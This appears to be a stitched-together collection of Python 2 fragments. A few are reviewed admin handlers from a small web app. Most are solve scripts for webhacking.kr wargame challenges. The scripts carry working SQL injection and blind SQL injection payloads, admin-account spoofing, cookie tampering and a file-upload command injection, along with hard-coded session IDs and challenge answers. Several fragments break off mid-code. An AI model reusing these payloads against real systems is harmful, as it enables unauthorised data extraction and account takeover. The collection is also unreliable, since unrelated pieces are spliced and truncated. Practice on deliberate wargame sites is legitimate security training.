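def get(self):
    """Delete the suggestion named by ``deleteid`` and render the redirect page.

    The ``expire`` cookie is checked with ``CookieManager.checkCookie``; a
    missing cookie counts as invalid (``valid = 0``).  The record is removed
    only when that check passed.  Before this fix the delete ran for any
    request that carried ``deleteid`` and ``valid`` was handed to the
    template only, so the server never enforced the check.
    """
    # NOTE(review): this writes the raw cookie value to the log. If the
    # cookie is what grants admin access, log a redacted form instead.
    exp = self.request.cookies.get('expire')
    logging.info(exp)
    # Assumes checkCookie() returns a falsy value for a rejected cookie,
    # matching the 0 used when the cookie is absent -- confirm.
    valid = CookieManager.checkCookie(exp) if exp is not None else 0

    saranObject = Saran.Saran()
    deleteID = self.request.get('deleteid')

    # NOTE(review): the listing lost its indentation; rendering is assumed
    # to belong to the delete branch -- confirm against the original file.
    if deleteID != '':
        if valid:
            # NOTE(review): a state-changing delete reached through GET can
            # be triggered by a plain link; POST plus a CSRF token is safer.
            saranObject.deleteSaran(deleteID)
        source = 'saran'

        template_values = {
            'valid': valid,
            'source': source,
        }
        template = JINJA_ENVIRONMENT.get_template('/redirect.html')
        self.response.write(template.render(template_values))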
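def post(self):
    """Store a submitted blog post and render the admin dashboard.

    A post is written to the datastore only when the form is ``submitPost``
    and the ``expire`` cookie passed ``CookieManager.checkCookie``.  Before
    this fix the insert did not depend on ``valid`` at all, so a request
    without a valid cookie could still create posts.
    """
    form = self.request.get('submitType')

    # NOTE(review): this writes the raw cookie value to the log. If the
    # cookie is what grants admin access, log a redacted form instead.
    exp = self.request.cookies.get('expire')
    logging.info(exp)
    # Assumes checkCookie() returns a falsy value for a rejected cookie,
    # matching the 0 used when the cookie is absent -- confirm.
    valid = CookieManager.checkCookie(exp) if exp is not None else 0

    # NOTE(review): the listing lost its indentation; the insert is assumed
    # to belong to the submitPost branch -- confirm against the original.
    if form == 'submitPost' and valid:
        title = self.request.get('title')
        content = self.request.get('content')
        postObject = Post.Post()
        postObject.insertToDatastore(title, content)

    # The dashboard is rendered in every case; the template receives the
    # result of the cookie check.
    template_values = {
        'valid': valid,
    }
    template = JINJA_ENVIRONMENT.get_template('/admin/dashboard.html')
    self.response.write(template.render(template_values))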
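def getPassword(portNumber):
    """Wait on ``portNumber`` for a message containing 'Password', print it,
    submit the stored answer to the challenge's auth endpoint, then exit.

    Fixes over the original:
    * ``data.find('Password')`` was used as a boolean, but ``find`` returns
      -1 (truthy) when the text is absent and 0 (falsy) when it is at the
      start, so the test was inverted in both cases.  A plain ``in`` check
      is used instead.
    * An empty ``recv`` (peer closed the connection) now ends the loop.
    * Both sockets are closed on every exit path; the original close call
      sat after an endless loop and never closed the accepted connection.
    """
    serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn = None
    try:
        # NOTE(review): '' binds every interface, so any host that can reach
        # this port can connect; bind a specific address if that is too wide.
        serverSocket.bind(('', portNumber))
        serverSocket.listen(1)
        conn, _ = serverSocket.accept()

        while True:
            time.sleep(1)
            data = conn.recv(4096)
            if not data:
                # Peer closed the connection without sending the message.
                break
            if 'Password' not in data:
                continue

            print data
            challengeUrl = "http://webhacking.kr/index.php?mode=auth_go"
            parameter = urllib.urlencode(
                {"answer": "38b4436dc68588052e60316619b33969"})
            httpRequest = urllib2.Request(challengeUrl, data=parameter)
            httpRequest.add_header("Cookie", CookieManager.getCookie())
            httpRequest.get_method = lambda: 'POST'

            httpConnection = None
            try:
                httpConnection = urllib2.urlopen(httpRequest)
                httpResponse = httpConnection.read()
                print httpResponse
            finally:
                if httpConnection is not None:
                    httpConnection.close()
            # SystemExit still runs the outer finally, so sockets are closed.
            sys.exit(0)
    finally:
        if conn is not None:
            conn.close()
        serverSocket.close()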
def get(self):
    """Render the admin suggestion-box page.

    Every suggestion returned by ``Saran.Saran().listSaran()`` is split into
    parallel lists (id, name, e-mail, content preview, timestamp) for the
    template.  Dates are localised as UTC and shown in Asia/Jakarta time;
    content longer than 50 characters is cut and suffixed with "...".
    """
    # NOTE(review): names and e-mail addresses are handed to the template
    # whatever the cookie check returned; whether they are shown depends on
    # the template honouring 'valid' -- confirm, or stop here when invalid.
    cookie_value = self.request.cookies.get('expire')
    logging.info(cookie_value)
    if cookie_value is None:
        valid = 0
    else:
        valid = CookieManager.checkCookie(cookie_value)

    suggestions = Saran.Saran().listSaran()
    total = len(suggestions)

    jakarta_zone = timezone('Asia/Jakarta')
    utc_zone = timezone('UTC')

    ids, names, emails, previews, stamps = [], [], [], [], []
    for entry in suggestions:
        # Stored dates are treated as UTC and converted for display.
        local_dt = utc_zone.localize(entry.date).astimezone(jakarta_zone)

        text = entry.isi
        preview = text[:50] + "..." if len(text) > 50 else text

        names.append(entry.nama)
        emails.append(entry.email)
        previews.append(preview)
        stamps.append(local_dt.strftime("%d-%m-%Y %H:%M:%S"))
        ids.append(entry.key.id())

    page = JINJA_ENVIRONMENT.get_template('/admin/kotak-saran.html')
    self.response.write(page.render({
        'valid': valid,
        'count': total,
        'nameList': names,
        'emailList': emails,
        'contentList': previews,
        'datetimeList': stamps,
        'saranIDList': ids,
    }))
def get(self):
    """Render the admin post menu.

    Every post returned by ``Post.Post().listPosts()`` is split into
    parallel lists (id, title, content preview, timestamp) for the
    template.  Dates are localised as UTC and shown in Asia/Jakarta time;
    content longer than 50 characters is cut and suffixed with "...".
    """
    # NOTE(review): the lists are handed to the template whatever the
    # cookie check returned; gating relies on the template reading 'valid'.
    cookie_value = self.request.cookies.get('expire')
    logging.info(cookie_value)
    if cookie_value is None:
        valid = 0
    else:
        valid = CookieManager.checkCookie(cookie_value)

    all_posts = Post.Post().listPosts()
    total = len(all_posts)

    jakarta_zone = timezone('Asia/Jakarta')
    utc_zone = timezone('UTC')

    ids, titles, previews, stamps = [], [], [], []
    for item in all_posts:
        # Stored dates are treated as UTC and converted for display.
        local_dt = utc_zone.localize(item.date).astimezone(jakarta_zone)

        text = item.content
        preview = text[:50] + "..." if len(text) > 50 else text

        titles.append(item.title)
        previews.append(preview)
        stamps.append(local_dt.strftime("%d-%m-%Y %H:%M:%S"))
        ids.append(item.key.id())

    page = JINJA_ENVIRONMENT.get_template('/admin/post-menu.html')
    self.response.write(page.render({
        'valid': valid,
        'count': total,
        'titleList': titles,
        'contentList': previews,
        'datetimeList': stamps,
        'postIDList': ids,
    }))
def __init__(self):
    """Set the database/table names and create the cookie and IP managers.

    Also loads the initial cookie list and proxy list and starts with an
    empty current proxy string.
    """
    # Extracted once per record.
    # self.bf = Bl.BloomCheckFunction()
    # Object initialisation; it only has to happen once.
    self.dbname = 'cookiemanage'
    self.tname = 'cookiesmanager'
    self.c = CookManager.CookieManager(self.dbname, self.tname)
    # Fetch the cookies from the database.
    self.p = Ip.IpManager()
    # Must run after self.c / self.p exist if getcookfromsql() uses them
    # (its body is not visible here -- confirm).
    self.cooklist = self.getcookfromsql()
    # presumably 10 is the number of proxies requested; verify against
    # IpManager.getproxyfromipsql.
    self.proxy = self.p.getproxyfromipsql(10)
    self.pro = ''
def get(self):
    """Render the admin dashboard, passing the result of the cookie check.

    ``valid`` is 0 when the ``expire`` cookie is missing, otherwise whatever
    ``CookieManager.checkCookie`` returns for it.
    """
    # NOTE(review): this writes the raw cookie value to the log.
    cookie_value = self.request.cookies.get('expire')
    logging.info(cookie_value)
    if cookie_value is None:
        valid = 0
    else:
        valid = CookieManager.checkCookie(cookie_value)

    page = JINJA_ENVIRONMENT.get_template('/admin/dashboard.html')
    self.response.write(page.render({'valid': valid}))
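def get(self):
    """Delete or open-for-edit a post, depending on the query string.

    * ``deleteid`` set: delete that post (only when the ``expire`` cookie
      passed ``CookieManager.checkCookie``) and render the redirect page.
    * otherwise ``editid`` set: load that post and render the edit page.
    * neither set: nothing is written to the response.

    Before this fix the delete did not depend on ``valid``; the flag was
    passed to the template only, so the server never enforced the check.
    """
    # NOTE(review): this writes the raw cookie value to the log. If the
    # cookie is what grants admin access, log a redacted form instead.
    exp = self.request.cookies.get('expire')
    logging.info(exp)
    # Assumes checkCookie() returns a falsy value for a rejected cookie,
    # matching the 0 used when the cookie is absent -- confirm.
    valid = CookieManager.checkCookie(exp) if exp is not None else 0

    postObject = Post.Post()
    deleteID = self.request.get('deleteid')
    editID = self.request.get('editid')

    if deleteID != '':
        if valid:
            # NOTE(review): a state-changing delete reached through GET can
            # be triggered by a plain link; POST plus a CSRF token is safer.
            postObject.deletePost(deleteID)
        source = 'post'

        template_values = {
            'valid': valid,
            'source': source,
        }
        template = JINJA_ENVIRONMENT.get_template('/redirect.html')
        self.response.write(template.render(template_values))
    elif editID != '':
        # NOTE(review): the post is loaded and handed to the template even
        # when the cookie check failed; the template is relied on to gate it.
        post = postObject.getPost(editID)

        template_values = {
            'valid': valid,
            'editID': editID,
            'post': post,
        }
        template = JINJA_ENVIRONMENT.get_template('/admin/edit-menu.html')
        self.response.write(template.render(template_values))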
#-*- coding: utf-8 -*- import urllib import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-03/index.php" sessionId = "d106ebfb4bba898681f92c7f5316fa6b" print "[*] SQL Injection" CookieManager.addCookie("PHPSESSID", sessionId) parameters = urllib.urlencode({"id": "admin", "answer": "1 || 1"}) httpRequest = urllib2.Request(challengeUrl, data=parameters) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpRequest.get_method = lambda: 'POST' httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
#-*- coding: utf-8 -*- import urllib2 import CookieManager print "[+] SQL Injection" challengeUrl = "http://webhacking.kr/challenge/web/web-24/index.php" parameter = "?lv=2%0a||%0aid=0x" + "admin".encode("hex") print parameter CookieManager.addCookie("PHPSESSID", "73ea5f35f558006f21f6185c171a2ed9") httpRequest = urllib2.Request(challengeUrl + parameter) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
1) user_lv의 첫 번째 문자가 "0~9", ",", "."이어야 함 2) user_lv의 값이 6보다 작아야 함 3) user_lv의 값이 5보다 커야 함 7. 조건을 만족하는 수를 user_lv 쿠키에 설정하여 해당 페이지를 호출하면 solve - 5 < user_lv < 6인 값을 쿠키에 설정하여 호출 - Hint : 숫자를 제외한 "." 문자도 사용 가능 """ import traceback import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-01/" CookieManager.addCookie("PHPSESSID=da0bd6cb852292c17cc2364c9dc6d334" ) # webhacking.kr에 로그인 하고 나온 cookie CookieManager.addCookie("user_lv=5.5") httpRequest = urllib2.Request(challengeUrl) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
ipAddress = "" httpConnection = None print "[+] Find IP Address" try: httpRequest = urllib2.Request("https://api.ipify.org") httpConnection = urllib2.urlopen(httpRequest) ipAddress = httpConnection.read() print "[*] Your IP Address is [", ipAddress, "]" except: raise finally: if httpConnection != None: httpConnection.close() # File Upload CookieManager.addCookie("PHPSESSID", "a90f69bdc1cdceaf479ca1ebcd368d29") challengeUrl = "http://webhacking.kr/challenge/web/web-18/" uploadFile = { "upfile": ("tmp-" + str(int(time.time())+5), ipAddress) } sessionCookie = { "PHPSESSID": "a90f69bdc1cdceaf479ca1ebcd368d29" } httpConnection = None try: print "[*] Finding password" for idx in range(0, 5): httpRequest = requests.post(challengeUrl, files=uploadFile, cookies=sessionCookie) sys.stdout.write(".")
#-*- coding: utf-8 -*- import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-35/g1v2m2passw0rd.php" print "[*] Clear Challenge 58" CookieManager.addCookie("PHPSESSID", "e52509baa15ced3a5be56d2efc0239b6") httpRequest = urllib2.Request(challengeUrl) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
#-*- coding: utf-8 -*- import sys import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-10/index.php" trueCondition = "<td>1</td>" flagCount = 0 isFoundFlagCount = False CookieManager.addCookie("PHPSESSID", "eabcdebaaabceddaabeabddefcabcdbe") print "[*] Find flag count from prob13password" for flagCount in range(1, 20): parameter = "?no=if((select(count(flag))from(prob13password))in(%d),1,2)" % flagCount httpRequest = urllib2.Request(challengeUrl + parameter) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print "[*] Blind SQL Injection...", flagCount if httpResponse.find(trueCondition) > 0: print "[+] FIND IT! flag count is [", flagCount, "]" isFoundFlagCount = True break except: raise finally:
#-*- coding: utf-8 -*- import urllib import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-05/mem/join.php" CookieManager.addCookie("PHPSESSID", "e28ad7cb81a98a13982054373940bf92") parameters = urllib.urlencode({"id": "admin ", "pw": "1q2w3e"}) httpRequest = urllib2.Request(challengeUrl, data=parameters) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpRequest.get_method = lambda: 'POST' httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close() challengeUrl = "http://webhacking.kr/challenge/web/web-05/mem/login.php" parameters = urllib.urlencode({"id": "admin", "pw": "1q2w3e"}) httpRequest = urllib2.Request(challengeUrl, data=parameters) httpRequest.add_header("Cookie", CookieManager.getCookie())
#-*- coding: utf-8 -*- import urllib import urllib2 import hashlib import CookieManager import time httpConnection = None challengeUrl = "http://webhacking.kr/challenge/bonus/bonus-6/?get=hehe" CookieManager.addCookie("PHPSESSID", "a90f69bdc1cdceaf479ca1ebcd368d29") httpRequest = urllib2.Request(challengeUrl) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close() # Level 2 challengeUrl = "http://webhacking.kr/challenge/bonus/bonus-6/lv2.php" CookieManager.addCookie("PHPSESSID", "a90f69bdc1cdceaf479ca1ebcd368d29") parameters = urllib.urlencode({"post": "hehe", "post2": "hehe2"}) httpRequest = urllib2.Request(challengeUrl, data=parameters)
httpRequest = requests.post(challengeUrl, files=uploadFile, cookies=sessionCookie, data=parameter) print httpRequest.text startTimeIndex = httpRequest.text.find("time") + 5 endTimeIndex = httpRequest.text.find(">", startTimeIndex) timestamp = httpRequest.text[startTimeIndex:endTimeIndex] except: raise finally: if httpConnection != None: httpConnection.close() print "[*] Delete File and Command Injection" CookieManager.addCookie("PHPSESSID", "aebaacacaaaaaabcaaaeadabafbccab") parameter = "?mode=del&time=" + timestamp httpRequest = urllib2.Request(challengeUrl + parameter) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close() print "[*] Clear Challenge 48"
#-*- coding: utf-8 -*- import sys import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-02/" falseCondition = "<!--2070-01-01 09:00:00-->" trueCondition = "<!--2070-01-01 09:00:01-->" print "[*] Find password length from Freeboard" passwordLength = 0 isFoundPassword = False CookieManager.addCookie("PHPSESSID", "d106ebfb4bba898681f92c7f5316fa6b") for passwordLength in range(1, 20): timeCookie = "1 and (SELECT length(password) FROM FreeB0aRd)=%d" % passwordLength CookieManager.addCookie("time", timeCookie) httpRequest = urllib2.Request(challengeUrl) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print "[*] Blind SQL Injection...", passwordLength if httpResponse.find(trueCondition) > 0: print "[+] FIND IT! password length is [", passwordLength, "]"
#-*- coding: utf-8 -*- import sys import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-29/index.php" trueCondition = "admin password" print "[*] Find admin password length" passwordLength = 0 isFoundPassword = False CookieManager.addCookie("PHPSESSID", "0eb95c9c96a3a8bc908e5d828f22cc3b") for passwordLength in range(1, 20): parameters = "?no=-1||no=2%26%26length(pw)=" + str(passwordLength) + "&id=0x61646d696e&pw=guest" httpRequest = urllib2.Request(challengeUrl + parameters) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print "[*] Blind SQL Injection...", passwordLength if httpResponse.find(trueCondition) > 0: print "[+] FIND IT! password length is [", passwordLength, "]" isFoundPassword = True break except: raise finally: if httpConnection != None:
#-*- coding: utf-8 -*- import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-06" CookieManager.addCookie("PHPSESSID", "e28ad7cb81a98a13982054373940bf92") CookieManager.addCookie( "user", "Vm0wd@QyUXlVWGxWV0d^V!YwZDRWMVl$WkRSV0!WbDNXa!JTVjAxV@JETlhhMUpUVmpBeFYySkVUbGhoTVVwVVZtcEJlRll&U@tWVWJHaG9UVlZ$VlZadGNFSmxSbGw!VTJ0V!ZXSkhhRzlVVmxaM!ZsWmFjVkZ0UmxSTmJFcEpWbTEwYTFkSFNrZGpSVGxhVmpOU!IxcFZXbUZrUjA!R!UyMTRVMkpIZHpGV!ZFb$dWakZhV0ZOcmFHaFNlbXhXVm!wT!QwMHhjRlpYYlVaclVqQTFSMWRyV@&kV0!ERkZVbFJHVjFaRmIzZFdha!poVjBaT@NtRkhhRk&sYlhoWFZtMXdUMVF$TUhoalJscFlZbGhTV0ZSV@FFTlNiRnBZWlVaT!ZXSlZXVEpWYkZKRFZqQXhkVlZ!V@xaaGExcFlXa!ZhVDJOc@NFZGhSMnhUVFcxb@IxWXhaREJaVmxsM!RVaG9hbEpzY0ZsWmJGWmhZMnhXY!ZGVVJsTk&WMUo!VmpKNFQxWlhTbFpYVkVwV!lrWktTRlpxUm!GU@JVbDZXa!prYUdFeGNHOVdha0poVkRKT@RGSnJhR@hTYXpWeldXeG9iMWRHV@&STldHUlZUVlpHTTFSVmFHOWhiRXB*WTBac!dtSkdXbWhaTVZwaFpFZFNTRkpyTlZOaVJtOTNWMnhXWVZReFdsaFRiRnBZVmtWd!YxbHJXa$RUUmxweFVtMUdVMkpWYkRaWGExcHJZVWRGZUdOSE9WZGhhMHBvVmtSS!QyUkdTbkpoUjJoVFlYcFdlbGRYZUc&aU!XUkhWMjVTVGxOSGFGQlZiVEUwVmpGU!ZtRkhPVmhTTUhCNVZHeGFjMWR0U@tkWGJXaGFUVzVvV0ZreFdrZFdWa$B*VkdzMVYySkdhM@hXYTFwaFZURlZlRmR!U@s!WFJYQnhWVzB^YjFZeFVsaE9WazVPVFZad@VGVXlkREJXTVZweVkwWndXR0V^Y0ROV@FrWkxWakpPU!dKR!pGZFNWWEJ@Vm!0U!MxUXlUWGxVYTFwb!VqTkNWRmxZY0ZkWFZscFlZMFU!YVUxcmJEUldNalZUVkd^a!NGVnNXbFZXYkhCWVZHdGFWbVZIUmtoUFYyaHBVbGhDTmxkVVFtRmpNV!IwVTJ0a!dHSlhhR0ZVVnpWdlYwWnJlRmRyWkZkV@EzQjZWa@R*TVZZd0!WWmlla!pYWWxoQ!RGUnJXbEpsUm!SellVWlNhVkp!UW&oV!YzaHJWVEZzVjFWc!dsaGlWVnBQVkZaYWQyVkdWWGxrUkVKWFRWWndlVmt$V@&kWFIwVjRZMFJPV@!FeVVrZGFWM@hIWTIxS!IxcEhiRmhTVlhCS!ZtMTBVMU!^VlhoWFdHaFlZbXhhVjFsc!pHOVdSbXhaWTBaa@JHSkhVbGxhVldNMVlWVXhXRlZyYUZkTmFsWlVWa@Q0YTFOR!ZuTlhiRlpYWWtoQ!NWWkdVa@RWTVZwMFVtdG9VRll&YUhCVmJHaERUbXhrVlZGdFJtcE&WMUl$VlRKMGExZEhTbGhoUjBaVlZucFdkbFl$V@&OT@JFcHpXa@R$YVZORlNrbFdNblJyWXpGVmVWTnVTbFJpVlZwWVZGYzFiMWRHWkZkWGJFcHNVbTFTZWxsVldsTmhWa$AxVVd^d!YySllVbGhhUkVaYVpVZEtTVk&zYUdoTk!VcFZWbGN^TkdReVZrZFdiR!JvVW&wc@IxUldXbmRsYkZsNVkwVmtWMDFFUmpGWlZXaExWMnh
hV0ZWclpHRldNMmhJV!RJeFMxSXhjRWhpUm!oVFZsaENTMVp0TVRCVk!VMTRWbGhvV0ZkSGFGbFpiWGhoVm!^c@NscEhPV$BTYkhCNFZrY$dOVll^V@&OalJXaFlWa!UxZGxsV!ZYaFhSbFp&WVVaa!RtRnNXbFZXYTJRMFdWWktjMVJ!VG!oU@JGcFlXV$hhUm!ReFduRlJiVVphVm0xU!NWWlhkRzloTVVwMFlVWlNWVlpXY0dGVVZscGhZekZ$UlZWdGNFNVdNVWwzVmxSS0!HRXhaRWhUYkdob!VqQmFWbFp0ZUhkTk!WcHlWMjFHYWxacmNEQmFSV!F$VmpKS@NsTnJhRmRTTTJob!ZrUktSMVl^VG&WVmJFSlhVbFJXV!ZaR!l*RmlNV!JIWWtaV!VsZEhhRlJVVm!SVFpXeHNWbGRzVG!oU!ZFWjZWVEkxYjFZeFdYcFZiR@hZVm!^d!lWcFZXbXRrVmtwelZtMXNWMUl*YURWV0!XUXdXVmRSZVZaclpGZGliRXB&Vld0V!MySXhiRmxqUldSc!ZteEtlbFp0TURWWFIwcEhZMFpvV@sxSGFFeFdNbmhoVjBaV@NscEhSbGROTW!oSlYxUkplRk!^U!hoalJXUmhVbXMxV0ZZd!ZrdE&iRnAwWTBWa!dsWXdWalJXYkdodlYwWmtTR0ZHV@xwaVdHaG9WbTE0YzJOc!pISmtSM0JUWWtad0&GWlhNVEJOUmxsNFYyNU9hbEpYYUZoV@FrNVRWRVpzVlZGWWFGTldhM0I@VmtkNFlWVXlTa!pYV0hCWFZsWndSMVF^V@tOVmJFSlZUVVF$UFE9PQ==" ) CookieManager.addCookie( "password", "Vm0wd@QyUXlVWGxWV0d^V!YwZDRWMVl$WkRSV0!WbDNXa!JTVjAxV@JETlhhMUpUVmpBeFYySkVUbGhoTVVwVVZtcEJlRll&U@tWVWJHaG9UVlZ$VlZadGNFSmxSbGw!VTJ0V!ZXSkhhRzlVVmxaM!ZsWmFjVkZ0UmxSTmJFcEpWbTEwYTFkSFNrZGpSVGxhVmpOU!IxcFZXbUZrUjA!R!UyMTRVMkpIZHpGV!ZFb$dWakZhV0ZOcmFHaFNlbXhXVm!wT!QwMHhjRlpYYlVaclVqQTFSMWRyV@&kV0!ERkZVbFJHVjFaRmIzZFdha!poVjBaT@NtRkhhRk&sYlhoWFZtMXdUMVF$TUhoalJscFlZbGhTV0ZSV@FFTlNiRnBZWlVaT!ZXSlZXVEpWYkZKRFZqQXhkVlZ!V@xaaGExcFlXa!ZhVDJOc@NFZGhSMnhUVFcxb@IxWXhaREJaVmxsM!RVaG9hbEpzY0ZsWmJGWmhZMnhXY!ZGVVJsTk&WMUo!VmpKNFQxWlhTbFpYVkVwV!lrWktTRlpxUm!GU@JVbDZXa!prYUdFeGNHOVdha0poVkRKT@RGSnJhR@hTYXpWeldXeG9iMWRHV@&STldHUlZUVlpHTTFSVmFHOWhiRXB*WTBac!dtSkdXbWhaTVZwaFpFZFNTRkpyTlZOaVJtOTNWMnhXWVZReFdsaFRiRnBZVmtWd!YxbHJXa$RUUmxweFVtMUdVMkpWYkRaWGExcHJZVWRGZUdOSE9WZGhhMHBvVmtSS!QyUkdTbkpoUjJoVFlYcFdlbGRYZUc&aU!XUkhWMjVTVGxOSGFGQlZiVEUwVmpGU!ZtRkhPVmhTTUhCNVZHeGFjMWR0U@tkWGJXaGFUVzVvV0ZreFdrZFdWa$B*VkdzMVYySkdhM@hXYTFwaFZURlZlRmR!U@s!WFJYQnhWVzB^YjFZeFVsaE9WazVPVFZad@VGVXlkREJXTVZweVkwWndXR0V^Y0ROV@FrWkxWakpPU!dKR!pGZFNWWEJ@Vm!0U!MxUXlUWGxVYTFwb!VqTkNWRmxZY0ZkWFZscFlZMFU!YVUxcmJEUldNalZUVkd^a!NGVnNXbFZXYkhCWVZHdGFWb
VZIUmtoUFYyaHBVbGhDTmxkVVFtRmpNV!IwVTJ0a!dHSlhhR0ZVVnpWdlYwWnJlRmRyWkZkV@EzQjZWa@R*TVZZd0!WWmlla!pYWWxoQ!RGUnJXbEpsUm!SellVWlNhVkp!UW&oV!YzaHJWVEZzVjFWc!dsaGlWVnBQVkZaYWQyVkdWWGxrUkVKWFRWWndlVmt$V@&kWFIwVjRZMFJPV@!FeVVrZGFWM@hIWTIxS!IxcEhiRmhTVlhCS!ZtMTBVMU!^VlhoWFdHaFlZbXhhVjFsc!pHOVdSbXhaWTBaa@JHSkhVbGxhVldNMVlWVXhXRlZyYUZkTmFsWlVWa@Q0YTFOR!ZuTlhiRlpYWWtoQ!NWWkdVa@RWTVZwMFVtdG9VRll&YUhCVmJHaERUbXhrVlZGdFJtcE&WMUl$VlRKMGExZEhTbGhoUjBaVlZucFdkbFl$V@&OT@JFcHpXa@R$YVZORlNrbFdNblJyWXpGVmVWTnVTbFJpVlZwWVZGYzFiMWRHWkZkWGJFcHNVbTFTZWxsVldsTmhWa$AxVVd^d!YySllVbGhhUkVaYVpVZEtTVk&zYUdoTk!VcFZWbGN^TkdReVZrZFdiR!JvVW&wc@IxUldXbmRsYkZsNVkwVmtWMDFFUmpGWlZXaExWMnhhV0ZWclpHRldNMmhJV!RJeFMxSXhjRWhpUm!oVFZsaENTMVp0TVRCVk!VMTRWbGhvV0ZkSGFGbFpiWGhoVm!^c@NscEhPV$BTYkhCNFZrY$dOVll^V@&OalJXaFlWa!UxZGxsV!ZYaFhSbFp&WVVaa!RtRnNXbFZXYTJRMFdWWktjMVJ!VG!oU@JGcFlXV$hhUm!ReFduRlJiVVphVm0xU!NWWlhkRzloTVVwMFlVWlNWVlpXY0dGVVZscGhZekZ$UlZWdGNFNVdNVWwzVmxSS0!HRXhaRWhUYkdob!VqQmFWbFp0ZUhkTk!WcHlWMjFHYWxacmNEQmFSV!F$VmpKS@NsTnJhRmRTTTJob!ZrUktSMVl^VG&WVmJFSlhVbFJXV!ZaR!l*RmlNV!JIWWtaV!VsZEhhRlJVVm!SVFpXeHNWbGRzVG!oU!ZFWjZWVEkxYjFZeFdYcFZiR@hZVm!^d!lWcFZXbXRrVmtwelZtMXNWMUl*YURWV0!XUXdXVmRSZVZaclpGZGliRXB&Vld0V!MySXhiRmxqUldSc!ZteEtlbFp0TURWWFIwcEhZMFpvV@sxSGFFeFdNbmhoVjBaV@NscEhSbGROTW!oSlYxUkplRk!^U!hoalJXUmhVbXMxV0ZZd!ZrdE&iRnAwWTBWa!dsWXdWalJXYkdodlYwWmtTR0ZHV@xwaVdHaG9WbTE0YzJOc!pISmtSM0JUWWtad0&GWlhNVEJOUmxsNFYyNU9hbEpYYUZoV@FrNVRWRVpzVlZGWWFGTldhM0I@VmtkNFlWVXlTa!pYV0hCWFZsWndSMVF^V@tOVmJFSlZUVVF$UFE9PQ==" ) httpRequest = urllib2.Request(challengeUrl) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpRequest.get_method = lambda: 'POST' httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
#-*- coding: utf-8 -*- import urllib import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/index.php?mode=auth_go" parameter = urllib.urlencode({ "answer": str(510*510) }); httpRequest = urllib2.Request(challengeUrl, data=parameter) CookieManager.addCookie("PHPSESSID", "5da1398a14fd19ed8ddcfb5ace4f7ac6") httpRequest.add_header("Cookie", CookieManager.getCookie()) httpRequest.get_method = lambda: 'POST' httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
#-*- coding: utf-8 -*- import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/bonus/bonus-4/" CookieManager.addCookie("PHPSESSID", "e28ad7cb81a98a13982054373940bf92") CookieManager.addCookie("REMOTE_ADDR", "112277..00..00..1") httpRequest = urllib2.Request(challengeUrl) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
# Step 1: ask api.ipify.org for this machine's public IP address.
public_ip = ""
connection = None

print "[+] Find IP Address"
try:
    lookup = urllib2.Request("https://api.ipify.org")
    connection = urllib2.urlopen(lookup)
    public_ip = connection.read()
    print "Your IP Address is [", public_ip, "]"
finally:
    # Errors propagate unchanged; the connection is closed either way.
    if connection is not None:
        connection.close()

# Step 2: request the code2 challenge page with the address embedded in the
# URL-quoted 'val' parameter, then print the response body.
print "[*] Try Challenge 11"
target_url = "http://webhacking.kr/challenge/codeing/code2.html" \
    + "?val=" + urllib.quote("3beeef_bindon" + public_ip + "bindon\tp\ta\ts\ts")

request = urllib2.Request(target_url)
# NOTE(review): a session identifier is a credential; it is hard-coded here
# and sent over plain HTTP. Load it from the environment rather than commit it.
CookieManager.addCookie("PHPSESSID", "79d2e02ad592877ec33fb8651960469d")
request.add_header("Cookie", CookieManager.getCookie())

# 'connection' is deliberately not reset here, as in the original: if this
# urlopen fails, the finally clause closes the step-1 connection again.
try:
    connection = urllib2.urlopen(request)
    body = connection.read()
    print body
finally:
